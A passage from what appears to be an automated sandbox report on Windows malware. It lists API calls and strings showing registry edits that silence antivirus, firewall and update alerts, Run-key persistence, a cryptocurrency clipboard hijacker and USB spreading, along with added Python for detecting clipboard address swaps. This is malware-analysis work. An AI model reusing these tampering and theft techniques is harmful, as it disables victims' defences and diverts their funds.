407a3f-407a5f RegOpenKeyExW 18->20 24 407ae4-407b04 RegOpenKeyExW 19->24 26 407a61-407a90 RegCreateKeyExW RegCloseKey 20->26 27 407a96-407ab6 RegOpenKeyExW 20->27 21->16 28 4076b2-4076d4 RegCloseKey call 40ef10 21->28 22->23 29 407757-40778a wcslen RegSetValueExW 22->29 23->4 25 407817-407846 SetFileAttributesW RegOpenKeyExW 23->25 32 407b06-407b32 RegSetValueExA RegCloseKey 24->32 33 407b37-407b57 RegOpenKeyExW 24->33 25->4 30 407848-40787b wcslen RegSetValueExW 25->30 26->27 27->24 31 407ab8-407ade RegSetValueExA RegCloseKey 27->31 28->16 43 4076d6-4076d8 ExitProcess 28->43 29->23 35 40778c-4077ae RegCloseKey call 40ef10 29->35 30->4 36 40787d-40789f RegCloseKey call 40ef10 30->36 31->24 37 407c33-407c53 RegOpenKeyExW 32->37 39 407b59-407b88 RegCreateKeyExW RegCloseKey 33->39 40 407b8e-407bae RegOpenKeyExW 33->40 35->23 49 
4077b0-4077b2 ExitProcess 35->49 36->4 56 4078a1-4078a3 ExitProcess 36->56 46 407c81-407ca1 RegOpenKeyExW 37->46 47 407c55-407c7b RegSetValueExA RegCloseKey 37->47 39->40 44 407bb0-407bdf RegCreateKeyExW RegCloseKey 40->44 45 407be5-407c05 RegOpenKeyExW 40->45 44->45 45->37 53 407c07-407c2d RegSetValueExA RegCloseKey 45->53 50 407ca3-407cc9 RegSetValueExA RegCloseKey 46->50 51 407ccf-407cef RegOpenKeyExA 46->51 47->46 50->51 54 407cf5-407dd5 RegSetValueExA * 7 RegCloseKey 51->54 55 407ddb-407dfb RegOpenKeyExA 51->55 53->37 54->55 57 407e01-407ee1 RegSetValueExA * 7 RegCloseKey 55->57 58 407ee7-407efc Sleep call 40cd60 55->58 57->58 61 408071-40807a 58->61 62 407f02-40806e WSAStartup wsprintfW * 2 CreateThread Sleep CreateThread Sleep CreateThread Sleep call 405b60 call 40dbd0 call 406f70 CreateEventA call 40c490 call 40d6c0 call 40b850 call 40d6f0 * 4 call 40d860 call 40d9a0 58->62 62->61
                                              APIs
                                              • Sleep.KERNELBASE(000007D0), ref: 0040750E
                                              • CreateMutexA.KERNELBASE(00000000,00000000,55a4er5wo), ref: 0040751D
                                              • GetLastError.KERNEL32 ref: 00407529
                                              • ExitProcess.KERNEL32 ref: 00407538
                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\file.exe,00000105), ref: 00407572
                                              • PathFindFileNameW.SHLWAPI(C:\Users\user\Desktop\file.exe), ref: 0040757D
                                              • wsprintfW.USER32 ref: 0040759A
                                              • DeleteFileW.KERNELBASE(?), ref: 004075AA
                                              • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 004075C1
                                              • wcscmp.NTDLL ref: 004075D3
                                              • ExitProcess.KERNEL32 ref: 004075F2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
                                              • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$55a4er5wo$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$C:\Users\user\Desktop\file.exe$CheckedValue$DisableWindowsUpdateAccess$DisableWindowsUpdateAccess$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$NoAutoUpdate$NoAutoUpdate$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL$SOFTWARE\Policies\Microsoft\Windows$SOFTWARE\Policies\Microsoft\Windows$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\BITS$SYSTEM\CurrentControlSet\Services\DoSvc$SYSTEM\CurrentControlSet\Services\UsoSvc$SYSTEM\CurrentControlSet\Services\WaaSMedicSvc$SYSTEM\CurrentControlSet\Services\wuauserv$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Start$Start$Start$Start$Start$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$WindowsUpdate$WindowsUpdate$sysmablsvr.exe
                                              • API String ID: 4172876685-3566645442
                                              • Opcode ID: 95bca734a32fc1ca3b6063aadf45f0f777810fdf47a36b8aa2289140a07bddb7
                                              • Instruction ID: a49710c48774a039d08af1d560b2319e957ec07716638a9d0d735a0d257e6f0f
                                              • Opcode Fuzzy Hash: 95bca734a32fc1ca3b6063aadf45f0f777810fdf47a36b8aa2289140a07bddb7
                                              • Instruction Fuzzy Hash: 9B5268B1B80318BBE7209B60DC4AFD93779AB48B11F1085A5F305B91D0DAF5A984CB5D

                                              Control-flow Graph

                                              control_flow_graph 89 40ef10-40ef70 memset * 2 CreateProcessW 90 40ef81-40efa5 ShellExecuteW 89->90 91 40ef72-40ef7f Sleep 89->91 93 40efb6 90->93 94 40efa7-40efb4 Sleep 90->94 92 40efb8-40efbb 91->92 93->92 94->92
                                              APIs
                                              • memset.NTDLL ref: 0040EF1E
                                              • memset.NTDLL ref: 0040EF2E
                                              • CreateProcessW.KERNELBASE(00000000,00407896,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040EF67
                                              • Sleep.KERNELBASE(000003E8), ref: 0040EF77
                                              • ShellExecuteW.SHELL32(00000000,open,00407896,00000000,00000000,00000000), ref: 0040EF92
                                              • Sleep.KERNEL32(000003E8), ref: 0040EFAC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleepmemset$CreateExecuteProcessShell
                                              • String ID: $D$open
                                              • API String ID: 3787208655-2182757814
                                              • Opcode ID: e2b186ad004b62e9ae343f364b445b77cfefa0e7e3aa45da8de068108c2434a4
                                              • Instruction ID: 2af3465f2ac7e3bdaf7f942b51208d096d5e25dcc258d3f6adac25a8060dddc3
                                              • Opcode Fuzzy Hash: e2b186ad004b62e9ae343f364b445b77cfefa0e7e3aa45da8de068108c2434a4
                                              • Instruction Fuzzy Hash: 6F114F71A84308BBEB10DB90DD46FDE7778AB14B00F204125FA09BE2C1D7F56A44C75A

                                               Control-flow Graph
                                               • Graph image not preserved; basic blocks: entry 0x406650-0x406665 (_chkstk) either returns through 0x406b48-0x406b4b or builds five paths with wsprintfW and tests PathFileExistsW (0x40666e-0x406720). Conditional cleanups follow (SetFileAttributesW with FILE_ATTRIBUTE_NORMAL then DeleteFileW at 0x406745-0x40675e and 0x406779-0x4067a7), then CreateDirectoryW followed by SetFileAttributesW with FILE_ATTRIBUTE_HIDDEN (0x4067a9-0x4067c5), CopyFileW of the module path held at 0x417500 (0x4067dc-0x4067fd) and a call into 0x406400 (0x40681c-0x406853). A FindFirstFileW/FindNextFileW/FindClose loop (0x406859-0x406b3c) skips two fixed names with lstrcmpW x2, filters entries with lstrcmpiW and PathMatchSpecW, deletes matching files (wsprintfW, SetFileAttributesW, DeleteFileW at 0x406a26-0x406a6c) and either moves the remaining entries with MoveFileExW (0x406b03-0x406b13) or recurses into 0x406510 (0x406aeb-0x406b01).
                                              APIs
                                              • _chkstk.NTDLL(?,00406CC0,?,?,?), ref: 00406658
                                              • wsprintfW.USER32 ref: 0040668F
                                              • wsprintfW.USER32 ref: 004066AF
                                              • wsprintfW.USER32 ref: 004066CF
                                              • wsprintfW.USER32 ref: 004066EF
                                              • wsprintfW.USER32 ref: 00406708
                                              • PathFileExistsW.SHLWAPI(?), ref: 00406718
                                              • SetFileAttributesW.KERNEL32(?,00000080), ref: 00406751
                                              • DeleteFileW.KERNEL32(?), ref: 0040675E
                                              • PathFileExistsW.SHLWAPI(?), ref: 0040676B
                                              • SetFileAttributesW.KERNEL32(?,00000080), ref: 00406785
                                              • DeleteFileW.KERNEL32(?), ref: 00406792
                                              • PathFileExistsW.SHLWAPI(?), ref: 0040679F
                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 004067B2
                                              • SetFileAttributesW.KERNEL32(?,00000002), ref: 004067C5
                                              • PathFileExistsW.SHLWAPI(?), ref: 004067D2
                                              • CopyFileW.KERNEL32(00417500,?,00000000), ref: 004067EA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$wsprintf$ExistsPath$Attributes$Delete$CopyCreateDirectory_chkstk
                                              • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\VolDrvConfig.exe$%s\*$shell32.dll$shell32.dll
                                              • API String ID: 2120662298-3006713477
                                              • Opcode ID: db5eccb7a8f15aa8004616f5cf87b59d8a7d315b42364bc1ec8f026dd92e313a
                                              • Instruction ID: c06ff6b6fb177b83c5a42a6bb152b383d4bd735e421ae8a12f9cadfa06fd6cc4
                                              • Opcode Fuzzy Hash: db5eccb7a8f15aa8004616f5cf87b59d8a7d315b42364bc1ec8f026dd92e313a
                                              • Instruction Fuzzy Hash: A8D164B5900258ABCB20DF50DC54FEA77B8BB48304F04C5EAF20AA6191D7B99BD4CF59
                                              APIs
                                              • lstrlenW.KERNEL32(00000000), ref: 004048BC
                                              • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00404C72
                                              • StrStrW.SHLWAPI(00000000,cosmos), ref: 00404C9D
                                              • StrStrW.SHLWAPI(00000000,addr), ref: 00404CC8
                                              • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00404D67
                                              • StrStrW.SHLWAPI(00000000,ronin:), ref: 00404D7E
                                              • StrStrW.SHLWAPI(00000000,nano_), ref: 00404D95
                                              • isalpha.NTDLL ref: 00404E14
                                              • isdigit.NTDLL ref: 00404E2B
                                              • StrStrW.SHLWAPI(00000000,bnb), ref: 0040530C
                                              • StrStrW.SHLWAPI(00000000,band), ref: 00405326
                                              • StrStrW.SHLWAPI(00000000,bc1), ref: 00405340
                                              • StrStrW.SHLWAPI(00000000,ronin:), ref: 0040535A
                                              • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00405374
                                              • StrStrW.SHLWAPI(00000000,cosmos), ref: 0040538E
                                              • StrStrW.SHLWAPI(00000000,addr), ref: 004053A8
                                              • StrStrW.SHLWAPI(00000000,nano_), ref: 004053C2
                                              • lstrlenA.KERNEL32(00000000), ref: 00405483
                                              • GlobalAlloc.KERNEL32(00002002,-00000001), ref: 0040549E
                                              • GlobalLock.KERNEL32(00000000), ref: 004054B1
                                              • memcpy.NTDLL(00000000,00000000,-00000001), ref: 004054CF
                                              • GlobalUnlock.KERNEL32(00000000), ref: 004054DB
                                              • OpenClipboard.USER32(00000000), ref: 004054E3
                                              • EmptyClipboard.USER32 ref: 004054ED
                                              • SetClipboardData.USER32(00000001,00000000), ref: 004054F9
                                              • CloseClipboard.USER32 ref: 004054FF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Clipboard$Global$lstrlen$AllocCloseDataEmptyLockOpenUnlockisalphaisdigitmemcpy
                                              • String ID: 0$addr$addr$band$bc1$bitcoincash:$bitcoincash:$bitcoincash:$bnb$cosmos$cosmos$hA$nano_$nano_$ronin:$ronin:
                                              • API String ID: 2780752356-1454159098
                                              • Opcode ID: 1df929a5d8f5b9e1bfb1efcb18d3a29233e0794c52f64d10113e7b7f4ba58d28
                                              • Instruction ID: d3cde74942e7afdaaf364769f000daf6be216c4f7804bb878a93964b207ef83b
                                              • Opcode Fuzzy Hash: 1df929a5d8f5b9e1bfb1efcb18d3a29233e0794c52f64d10113e7b7f4ba58d28
                                              • Instruction Fuzzy Hash: DE8239B0A00218EACF548F41C0945BE7BB2EF82751F60C0ABE9456F294D77D9EC1DB98
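The routine above is the clipboard hijacker ("clipper") behind the "Contains functionality to modify clipboard data" signature: it reads the copied text, runs StrStrW against a fixed set of cryptocurrency address prefixes (bitcoincash:, ronin:, nano_, cosmos, bnb, band, bc1, addr), walks the characters with isalpha/isdigit, and writes a replacement back with GlobalAlloc, OpenClipboard, EmptyClipboard and SetClipboardData(CF_TEXT). The Python below is an added example, not code from the report or from the sample: it models that address check and shows the one fingerprint a clipper cannot hide, a copied address that reappears as a different address of the same family at paste time. The prefix-at-start rule, the alphanumeric-body rule and the family labels are this example's assumptions; the clipboard events are constructed and the addresses are dummies.

```python
"""Model of the clipboard-address check in the routine above and a detector
for the resulting clipboard swaps. Added example; not code from the report
or from the sample."""

# Prefixes the routine searches for with StrStrW (from the API list above).
# The family labels are this example's own, used for reporting only.
ADDRESS_PREFIXES = {
    "bitcoincash:": "bitcoincash",
    "ronin:": "ronin",
    "nano_": "nano",
    "cosmos": "cosmos",
    "bnb": "bnb",
    "band": "band",
    "bc1": "bc1",
    "addr": "addr",
}


def classify_address(text: str):
    """Return the family name if `text` is something the clipper would target,
    else None. Assumptions: the prefix must sit at the start of the copied text
    (StrStrW alone would match anywhere) and, mirroring the isalpha/isdigit
    walk in the disassembly, every character after the prefix is alphanumeric."""
    s = text.strip()
    for prefix, family in ADDRESS_PREFIXES.items():
        if s.startswith(prefix):
            body = s[len(prefix):]
            return family if body and body.isalnum() else None
    return None


def detect_swap(copied: str, pasted: str):
    """A clipper leaves one fingerprint: the clipboard held an address when the
    user copied it and holds a different address of the same family at paste
    time. Returns the family on a swap, else None."""
    fam_in, fam_out = classify_address(copied), classify_address(pasted)
    if fam_in is None or fam_in != fam_out:
        return None
    return fam_in if copied.strip() != pasted.strip() else None


def scan_clipboard_log(events):
    """events: iterable of (copied_text, clipboard_text_at_paste).
    Returns the swaps found as (event index, family, copied, pasted)."""
    findings = []
    for i, (copied, pasted) in enumerate(events):
        family = detect_swap(copied, pasted)
        if family:
            findings.append((i, family, copied, pasted))
    return findings


# Constructed clipboard events for the demo; the addresses are dummies, not
# real wallets (a clipper's replacement would be attacker-controlled).
CONSTRUCTED_EVENTS = [
    ("bc1qcopied00aaaaaaaaaaaaaaaaaaaaaaaaaaaa", "bc1qswapped0bbbbbbbbbbbbbbbbbbbbbbbbbbbb"),
    ("meeting moved to 15:00", "meeting moved to 15:00"),
    ("ronin:00c0ffee00c0ffee00c0ffee00c0ffee00c0ffee",
     "ronin:00c0ffee00c0ffee00c0ffee00c0ffee00c0ffee"),
    ("nano_1copied0000000000000000000000000000000000000000000000000000",
     "nano_3swapped000000000000000000000000000000000000000000000000000"),
]

if __name__ == "__main__":
    for index, family, before, after in scan_clipboard_log(CONSTRUCTED_EVENTS):
        print(f"event {index}: {family} address replaced: {before} -> {after}")
```

The detector deliberately ignores copies that are not addresses and copies that survive unchanged; only a same-family substitution is reported, which is exactly what the GlobalAlloc/SetClipboardData sequence above produces. A wallet or exchange front end can apply the same comparison between the address the user typed or scanned and the one that arrives via paste.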

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _allshl_aullshr
                                              • String ID: Y
                                              • API String ID: 673498613-3233089245
                                              • Opcode ID: 7286a3771c49fe6dd85f91ec8c346872754a56a447a9e0d5d293665731471eb7
                                              • Instruction ID: 38e152ebd7ea95bc8f380bf4b2252a64c27ffc37453e75a420e7eb0cbbf7c908
                                              • Opcode Fuzzy Hash: 7286a3771c49fe6dd85f91ec8c346872754a56a447a9e0d5d293665731471eb7
                                              • Instruction Fuzzy Hash: B8D22A79D11619EFCB54CF99C18099EFBF1FF88320F62859AD845AB305C630AA95DF80

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _allshl_aullshr
                                              • String ID:
                                              • API String ID: 673498613-0
                                              • Opcode ID: 21d62b95df156d65b0f58ece9101bfe8da6afc21161c3ccb89e1e1339c27952d
                                              • Instruction ID: 210ecbc2d6fc9dc29dd7b869163d3ab15cad43ed1e12d09afb70b2b575c36fe3
                                              • Opcode Fuzzy Hash: 21d62b95df156d65b0f58ece9101bfe8da6afc21161c3ccb89e1e1339c27952d
                                              • Instruction Fuzzy Hash: 30D22A79D11619EFCB54CF99C18099EFBF1FF88320F62859AD845AB305C630AA95DF80

                                               Control-flow Graph
                                               • Graph image not preserved; basic blocks: the window procedure starts with GetWindowLongW at 0x405910-0x405932 and dispatches on the message. One path registers the window as a clipboard viewer with SetClipboardViewer + SetWindowLongW (0x405964-0x405981); another (0x4059c7 onward) tests IsClipboardFormatAvailable three times, then runs OpenClipboard, GetClipboardData and GlobalLock (0x405a15-0x405a4e), hands the text to 0x405630, 0x405750 or 0x405510, releases it with GlobalUnlock + CloseClipboard (0x405ab1-0x405ac5) and may call 0x4048a0 (the address-check routine above) and 0x40a740 (0x405ac7-0x405adc). Chain-forwarding paths use SendMessageA (0x4059ac-0x4059bc, 0x405ae5-0x405af5); the teardown block 0x405afd-0x405b3e calls RegisterRawInputDevices and ChangeClipboardChain; every exit reaches DefWindowProcA at 0x405b44-0x405b5d.
                                              APIs
                                              • GetWindowLongW.USER32(?,000000EB), ref: 0040591C
                                              • SetClipboardViewer.USER32(?), ref: 00405968
                                              • SetWindowLongW.USER32(?,000000EB,?), ref: 0040597B
                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 004059D0
                                              • OpenClipboard.USER32(00000000), ref: 00405A17
                                              • GetClipboardData.USER32(00000000), ref: 00405A29
                                              • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405B30
                                              • ChangeClipboardChain.USER32(?,?), ref: 00405B3E
                                              • DefWindowProcA.USER32(?,?,?,?), ref: 00405B54
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                              • String ID:
                                              • API String ID: 3549449529-0
                                              • Opcode ID: ce536a5ebd17aa25bd8c63565adcaae9255b97c75774932fd7b0e60d3253294e
                                              • Instruction ID: 140c23de002baebc09e84a4b6840f2c6f62578de50faf7348504d1cb8e8204ab
                                              • Opcode Fuzzy Hash: ce536a5ebd17aa25bd8c63565adcaae9255b97c75774932fd7b0e60d3253294e
                                              • Instruction Fuzzy Hash: 80710C75A00608EFDF14DFA4D988BAFB7B4EB48300F10856AE506B7290D7799A40CF69

                                               Control-flow Graph
                                               • Graph image not preserved; basic blocks: CreateDirectoryW, wsprintfW and FindFirstFileW at 0x406510-0x40655f; the loop 0x406565-0x406622 skips two fixed names with lstrcmpW x2, builds source and destination paths with wsprintfW x2, recurses into 0x406510 for subdirectories (0x4065de-0x4065f4) or moves files with MoveFileExW (0x4065f6-0x406606), and advances with FindNextFileW; FindClose + RemoveDirectoryW at 0x406628-0x406639, return at 0x40663f-0x406642.
                                              APIs
                                              • CreateDirectoryW.KERNEL32(00406AFE,00000000), ref: 0040651F
                                              • wsprintfW.USER32 ref: 00406535
                                              • FindFirstFileW.KERNEL32(?,?), ref: 0040654C
                                              • lstrcmpW.KERNEL32(?,00410FC8), ref: 00406571
                                              • lstrcmpW.KERNEL32(?,00410FCC), ref: 00406587
                                              • wsprintfW.USER32 ref: 004065AA
                                              • wsprintfW.USER32 ref: 004065CA
                                              • MoveFileExW.KERNEL32(?,?,00000009), ref: 00406606
                                              • FindNextFileW.KERNEL32(000000FF,?), ref: 0040661A
                                              • FindClose.KERNEL32(000000FF), ref: 0040662F
                                              • RemoveDirectoryW.KERNEL32(?), ref: 00406639
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                              • String ID: %s\%s$%s\%s$%s\*
                                              • API String ID: 92872011-445461498
                                              • Opcode ID: aaf4b3f36bfa67770f4778d47adab31ac8eaf14f3968b868ec32d0f8b28c6d5c
                                              • Instruction ID: 29a521c4e1aad10613397e171bad1bd73fe874f8ff332ca0de340875b50b0acb
                                              • Opcode Fuzzy Hash: aaf4b3f36bfa67770f4778d47adab31ac8eaf14f3968b868ec32d0f8b28c6d5c
                                              • Instruction Fuzzy Hash: 56315BB5500218AFCB10DB60EC85FDA7778AB48701F40C5A9F609A3185DBB5DAD9CF68
                                              APIs
                                              • Sleep.KERNEL32(000003E8), ref: 00406B5E
                                              • GetModuleFileNameW.KERNEL32(00000000,00417500,00000104), ref: 00406B70
                                                • Part of subcall function 0040ED00: CreateFileW.KERNEL32(00406B80,80000000,00000001,00000000,00000003,00000000,00000000,00406B80), ref: 0040ED20
                                                • Part of subcall function 0040ED00: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040ED35
                                                • Part of subcall function 0040ED00: CloseHandle.KERNEL32(000000FF), ref: 0040ED42
                                              • ExitThread.KERNEL32 ref: 00406CDA
                                                • Part of subcall function 00406340: GetLogicalDrives.KERNEL32 ref: 00406346
                                                • Part of subcall function 00406340: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394
                                                • Part of subcall function 00406340: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 004063C1
                                                • Part of subcall function 00406340: RegCloseKey.ADVAPI32(?), ref: 004063DE
                                              • Sleep.KERNEL32(000007D0), ref: 00406CCD
                                                • Part of subcall function 00406260: lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 004062B3
                                              • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 00406C0F
                                              • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00406C24
                                              • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 00406C3F
                                              • wsprintfW.USER32 ref: 00406C52
                                              • wsprintfW.USER32 ref: 00406C72
                                              • wsprintfW.USER32 ref: 00406C95
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                              • String ID: (%dGB)$%s%s$Unnamed volume
                                              • API String ID: 1650488544-2117135753
                                              • Opcode ID: 28cf1d750f559b85cf67cfd50a9e6b26b5fb1b314e0712f8dd8363f24fb25f9f
                                              • Instruction ID: 6971fabc066a78c2b5f4f93c2536245faf55c75ef939042e540841f18162a7fc
                                              • Opcode Fuzzy Hash: 28cf1d750f559b85cf67cfd50a9e6b26b5fb1b314e0712f8dd8363f24fb25f9f
                                              • Instruction Fuzzy Hash: 1D419BB1900214BBE714DB94DD55FEE7778BB48700F1081A5F20AB61D0DA785794CF6A
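Taken together, the drive-walking thread above and the routine at 0x406650 describe a removable-media spreader: GetLogicalDrives is filtered by the Explorer NoDrives policy read from HKLM, each volume's label comes from GetVolumeInformationW (with "Unnamed volume" as fallback), its total size from GetDiskFreeSpaceExW divided by 0x40000000 into "(%dGB)", and on the drive the sample copies its own module path (0x417500, filled by GetModuleFileNameW) to "%s\%s\VolDrvConfig.exe" inside a directory it marks FILE_ATTRIBUTE_HIDDEN, drops a "%s.lnk" and moves the existing entries aside via 0x406510 (MoveFileExW with MOVEFILE_REPLACE_EXISTING|MOVEFILE_WRITE_THROUGH). The Python below is an added triage helper, not code from the report or the sample: it decodes the two drive bitmasks, rebuilds the lure name the sample would produce for a given volume, and walks a mounted drive for the artefacts. The exact spacing of the lure name, the hidden directory's name and the constructed directory layout are assumptions of this example.

```python
"""Triage helper for removable media touched by the USB-spreading routines
above (self-copy as VolDrvConfig.exe in a hidden directory plus a
"<label> (NGB).lnk" lure). Added example, not the sample's or Joe Sandbox's."""
import os
import re
import string
import tempfile

GIB = 0x40000000              # divisor in the _aulldiv call: bytes -> whole GiB
PAYLOAD_NAME = "voldrvconfig.exe"
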